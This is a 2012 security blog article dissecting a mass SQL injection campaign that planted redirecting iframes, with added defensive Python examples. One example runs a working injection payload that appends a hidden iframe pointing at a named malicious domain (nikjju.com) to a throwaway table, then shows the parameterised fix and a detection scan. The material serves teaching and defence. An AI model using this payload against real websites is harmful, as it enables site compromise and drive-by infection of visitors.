APT

Anatomy of an Attack

August 6, 2012

Today's sophisticated internet attacks chain several vulnerabilities. A one-on-one protection approach, in which each threat is paired with a single security technology, is therefore no longer enough. Countering current internet-borne attacks requires a multi-vector security strategy.

To make this concrete, consider the wide-scale SQL injection attack that hit websites in early May 2012.

Deciphering the attack
In the first step, the attacker probes trustworthy websites for vulnerabilities such as SQL injection or cross-site scripting (XSS). In this incident, the attackers used SQL injection to add an iframe to trustworthy but vulnerable websites; the iframe redirected visitors to one of the following domains: hgbyju.com, hnjhkm.com, nikjju.com, or njukol.com. At this stage, where a security loophole in the website is exploited, the risk of a successful attack could have been reduced by a reactive security technology such as a web application firewall, or averted altogether with proactive security technologies like:

  • Source code review and binary analysis (static, non-runtime)
  • Web application scanner (dynamic, runtime)
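As an added illustration, not code from the original article, the following Python example reproduces the first step against a constructed, throwaway SQLite "news" table: an article-editing sink that builds its UPDATE by string concatenation, an injected payload that appends a hidden iframe to every row (the table, application and payload are constructed for the example; the redirect domains are the ones named above), the parameterised version of the same sink, and a scan that finds rows already carrying an iframe pointing at one of the listed domains.

```python
import re
import sqlite3

# Redirect domains named in the article.  Everything else here (table,
# application, payload) is constructed for this example.
REDIRECT_DOMAINS = ("hgbyju.com", "hnjhkm.com", "nikjju.com", "njukol.com")

# Constructed attacker input for the "body" field.  It closes the string
# literal, appends a hidden iframe to the existing body, widens the WHERE
# clause to every row, and comments out the rest of the original query.
PAYLOAD = ("' || body || '<iframe src=\"http://nikjju.com/r.php\" "
           "width=0 height=0></iframe>' WHERE 1=1 --")

IFRAME_HOST = re.compile(r"<iframe[^>]+src=[\"']?https?://([^/\"'\s>]+)", re.I)


def make_db():
    """Throwaway in-memory 'news' table with two clean articles."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO news (title, body) VALUES (?, ?)",
                     [("Welcome", "<p>Hello</p>"), ("Release notes", "<p>v2 is out</p>")])
    conn.commit()
    return conn


def update_body_vulnerable(conn, article_id, new_body):
    """The injection sink: user input is pasted straight into the SQL text."""
    sql = "UPDATE news SET body = '%s' WHERE id = %s" % (new_body, article_id)
    conn.execute(sql)
    conn.commit()


def update_body_safe(conn, article_id, new_body):
    """Same operation with bound parameters; the input can never become SQL."""
    conn.execute("UPDATE news SET body = ? WHERE id = ?", (new_body, int(article_id)))
    conn.commit()


def find_poisoned_rows(conn):
    """Rows whose body carries an iframe pointing at one of the redirect domains."""
    hits = []
    for row_id, body in conn.execute("SELECT id, body FROM news ORDER BY id"):
        for match in IFRAME_HOST.finditer(body):
            host = match.group(1).lower()
            if any(host == d or host.endswith("." + d) for d in REDIRECT_DOMAINS):
                hits.append((row_id, host))
    return hits


def demo():
    """Runs the constructed payload through both sinks; returns what the scan finds."""
    conn = make_db()
    update_body_vulnerable(conn, "1", PAYLOAD)   # attacker was only "editing" article 1
    vulnerable_hits = find_poisoned_rows(conn)

    conn = make_db()
    update_body_safe(conn, "1", PAYLOAD)
    safe_hits = find_poisoned_rows(conn)
    return {"vulnerable": vulnerable_hits, "parameterised": safe_hits}


if __name__ == "__main__":
    print(demo())
```

Through the vulnerable sink, one request poisons every article, which is what made the May 2012 campaign spread so widely. Through the parameterised sink the attacker's string lands only in the single field they were allowed to edit, but it lands there verbatim: binding parameters stops SQL injection, not stored XSS, so output encoding when the body is rendered and a scan like find_poisoned_rows over the existing data are still needed.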

The attack in question targeted various popular websites and hit their visitors indiscriminately. Although step two in the figure was not actually part of this attack, it could have been used to make the attack more effective: an email luring a targeted victim to a website compromised through SQL injection or XSS. This is the second stage where the risk can be reduced, by a security technology such as a spam filter that intercepts phishing emails.

In the third step, the victim visits an apparently trustworthy website and is redirected to a malicious one. This is the third stage where the attack could have been stopped, by a content filter that blocks either the dangerous content served by the malicious website or the website as a whole.

This brings us to the fourth and last step. The victim's browser executes client-side HTML/JavaScript served by the malicious website, which exploits vulnerabilities in Oracle Java SE (CVE-2012-0507) or Adobe Acrobat and Reader (CVE-2010-0188) on the victim's system. If the exploit succeeds, a Trojan horse is downloaded and executed on the victim's machine, exposing the victim to risks including theft of financial information and identity theft. At this stage, the attack could have been stopped by a network intrusion prevention system intercepting the exploit, by proper patch management (unless the vulnerability is a zero-day), or by an anti-malware technology on the network blocking the Trojan horse.

The security technologies mentioned above, except host patching, can be implemented host-based, network-based, or both. Two points favour the host-based implementation:

  • It can protect against attacks launched through encrypted channels, since the encryption is terminated on the host
  • The "anytime, anywhere, anyhow" concept and cloud computing make it hard to control the path through which an endpoint connects to the internet, so a network-based control may simply not be in that path

It follows that network-based security technologies are no longer an absolute. Deperimeterisation of client endpoints, driven by the "anytime, anywhere, anyhow" concept and cloud computing, often reduces the effectiveness of network-based security technologies. For the server back-end core infrastructure, however, network-based security technologies remain absolutely advisable: a defense-in-depth strategy across the data center network and the hosts (servers) must not be neglected.

As the walk-through shows, the internet, and in particular HTTP and HTTPS traffic on ports 80 and 443, is the channel through which such an attack is launched. For an enterprise, this creates two distinct security responsibilities:

  • Preventing its own users from falling victim to threats such as the above
  • Ensuring that visitors to its own website do not fall victim because of the website's lack of security

It's time to bell the cat
Why are source code review, binary analysis, web application scanning, and web application firewalling still under-used in enterprises? Are the responsibilities unclear? Is it an infrastructure or an application responsibility? Meanwhile, it is no surprise that attack scenarios are being orchestrated around the web while we are still trying to work out who is responsible.

A clear lesson from the above is that mitigating an attack with a one-on-one strategy, one security technology per threat, is no longer sufficient. A multi-vector security strategy, together with integrated insight, is fundamental.

In other words, security intelligence should be part of the multi-vector strategy as well: the ability to assess the relevance of a threat or attack using information from sources such as a configuration management database, a threat/security-technology correlation tool, and a security information and event manager.
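What that relevance assessment looks like in practice, as an added example that is not part of the original article: a Python triage routine that correlates exploit-kit alerts from a SIEM or IPS with a CMDB extract of installed client software and the fixing release for each CVE the fourth step exploits. The alerts, the host names, the CMDB contents and the product versions are constructed for the example; the fixing releases (Java 7 Update 3 and 6 Update 31 for CVE-2012-0507, Reader 9.3.1 and 8.2.1 for CVE-2010-0188) are given as recalled from the vendor advisories and should be treated as an assumption to verify.

```python
import re

# Constructed SIEM/IPS alerts: an exploit signature fired for a source host.
ALERTS = [
    {"id": 1, "host": "ws-0123", "cve": "CVE-2012-0507"},
    {"id": 2, "host": "ws-0124", "cve": "CVE-2012-0507"},
    {"id": 3, "host": "ws-0123", "cve": "CVE-2010-0188"},
    {"id": 4, "host": "srv-09",  "cve": "CVE-2010-0188"},
    {"id": 5, "host": "ws-0125", "cve": "CVE-2012-0507"},
]

# Constructed CMDB extract: installed client software per host.
CMDB = {
    "ws-0123": {"java": "1.7.0_02"},
    "ws-0124": {"java": "1.7.0_04", "adobe_reader": "9.4.0"},
    "srv-09":  {"adobe_reader": "9.3.0"},
}

# Threat knowledge: affected product and first fixed version per branch.
# Java 7u3 / 6u31 and Reader 9.3.1 / 8.2.1 are the fixing releases as
# recalled from the vendor advisories; an assumption to verify before use.
FIXED_IN = {
    "CVE-2012-0507": ("java", {(1, 7): (1, 7, 0, 3), (1, 6): (1, 6, 0, 31)}),
    "CVE-2010-0188": ("adobe_reader", {(9,): (9, 3, 1), (8,): (8, 2, 1)}),
}


def parse_version(text):
    """'1.7.0_02' -> (1, 7, 0, 2); '9.3.0' -> (9, 3, 0)."""
    return tuple(int(part) for part in re.split(r"[._]", text))


def assess(alert, cmdb=CMDB, intel=FIXED_IN):
    """Relevance of one alert given what the CMDB says is installed on the host."""
    if alert["cve"] not in intel:
        return "no-intel"
    host = cmdb.get(alert["host"])
    if host is None:
        return "unknown-host"          # asset not inventoried: that gap is itself a finding
    product, branches = intel[alert["cve"]]
    installed = host.get(product)
    if installed is None:
        return "not-applicable"        # exploit was served, but there is no target to hit
    version = parse_version(installed)
    for branch, fixed in branches.items():
        if version[:len(branch)] == branch:
            return "patched" if version >= fixed else "vulnerable"
    return "unknown-branch"            # version outside the branches we have intel for


def triage(alerts=ALERTS, cmdb=CMDB):
    """(alert id, host, cve, verdict) per alert, most urgent first."""
    order = {"vulnerable": 0, "unknown-host": 1, "unknown-branch": 2,
             "no-intel": 3, "not-applicable": 4, "patched": 5}
    verdicts = [(a["id"], a["host"], a["cve"], assess(a, cmdb)) for a in alerts]
    return sorted(verdicts, key=lambda v: order[v[3]])


if __name__ == "__main__":
    for verdict in triage():
        print(verdict)
```

The same IPS signature therefore lands at the top of the queue for a host running Java 7 Update 2 and at the bottom for one already on Update 4, and an alert for a Reader exploit on a host that has no Reader installed is closed as not applicable. Hosts missing from the CMDB are deliberately kept near the top: an uninventoried endpoint that is being served exploits cannot be assessed, and that is a gap to fix rather than an alert to dismiss.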